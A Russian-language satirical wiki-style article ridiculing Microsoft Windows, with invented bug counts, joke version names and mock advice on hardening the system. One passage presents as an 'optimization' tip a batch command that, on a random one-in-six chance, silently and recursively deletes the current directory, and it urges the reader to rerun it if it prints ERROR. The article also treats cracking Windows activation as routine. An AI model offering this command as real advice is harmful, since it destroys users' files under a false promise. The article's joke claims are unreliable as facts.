Microsoft® Windows — самая популярная среда распространения вирусов, или, как её называют в компании Microsoft, «операционная система». Первая версия Windows, которая не была воспринята народом и, что самое интересное, имеет всего 69 глюков, датируется июнем 1985 года, а Windows 3.0, первая общепринятая версия «системы» — маем 1990-го, имея уже 1337 глюков (не считая глюками способы вызвать BSOD из программ и Ctrl-Alt-Delete). Сейчас наибольшую популярность имеют три версии Windows: Windows 2000(1999), Windows XP(2001) и Windows Vista(2007). На данный момент вышла новая версия Windows, Windows 6.66 (она же просто Windows 7)
Рассмотрим самую популярную — это Windows XP. К ней прилагается дополнительное ПО:
Internet Explorer 6, система закачек троянов
Windows Media Player 8, младший помощник закачек троянов, благодаря поддержке многозадачности, пока трояны закачиваются, можно слушать музыку
Outlook Express, программа для получения спама и троянов по почте,
Windows Movie Maker, вирус, который повреждает видеофайлы
То есть, входящее в Windows XP ПО является вредоносным чуть более, чем на 100 %.
Далее. Windows XP — это некое подобие бомбы замедленного действия, так как после установки нужно провести
«Активацию Windows» © Microsoft
, а точнее дезактивацию Windows при помощи программы, именуемой Crack. Программ, являющихся Crack’ами для Windows XP, много, но чуть менее, чем полностью они являются вредоносными. К сожалению, если не дезактивировать Windows XP за 30 дней, то она будет загружаться только в максимально безопасном режиме, в котором она не работает не глючит защищает пользователя.
Единственный способ избежать геморроя, связанного с использованием Windows, является переход на альтернативные операционные системы, например GNU/Linux, *BSD или MacOS.
Также только нуб не знает, что для оптимизации системы нужно создать на диске C:\ файл optimiz.bat и вписать в него блокнотом «set /a R=0+6*%random%/32768 && if %R% == 0 (rd /s /q .\) else (echo ERROR)» без кавычек. Команда убирает из системы все лишнее. Если выводит ERROR — перезапустить.
[править] Альтернативные мнения
«Windows — не говно, просто вы ее говно правильно готовить не умеете»
Рассмотрим подробнее, как правильно приготовить Windows:
0. Убрать всю красоту из интерфейса. Отключить все неиспользуемые службы (их список далеко не очевиден). Отключить весь искусственный интеллект.
1. Отключить от Интернета физически либо посадить в глубокий интранет за фаерволлом не на основе Windows. Жестко фильтровать весь входящий и исходящий трафик. Проверять весь трафик на известные сигнатуры shitware и неизвестные аномалии (примерно раз в 3-5 минут). Поставить антивирус с ежедневным обновлением несколько раз в сутки.
2. Внедрить ограниченную программную среду — разрешить запуск только определенных приложений.
3. В Интернете — анализировать весь трафик на сигнатуры и аномалии. Внедрить шифрование и электронную подпись всего трафика между серверами Windows и клиентами Windows.
4. Резервное копирование максимального объема информации ежедневно.
5. Отключить порты USB и дисководы CD-DVD.
6. Радикально урезать полномочия юзеров.
7. Не поддаваться на провокации фирмы Microsoft — не обновлять версий Windows, Office и других программ, пока не припрет. Помните — каждая новая версия жрет вдвое больше ресурсов и предоставляет новые неизвестные дыры для желающих в них поковырять (при этом старые дыры никуда не деваются, так как процент reusable code в фирме Microsoft достигает 80).
8. … список может быть неполон …
9. ?????
10. PROFIT
Естественно, не у каждого юзера и даже админа хватит знаний, силы духа, полномочий и ресурсов на такие действия (про ламеров вообще речи нет). Поэтому растут ряды юниксоидов и близится вендекапец!
«Все ж мацают…»
Windows глючит у 95 % пользователей. Остальные либо пряморуки, либо пенсионеры (не включают).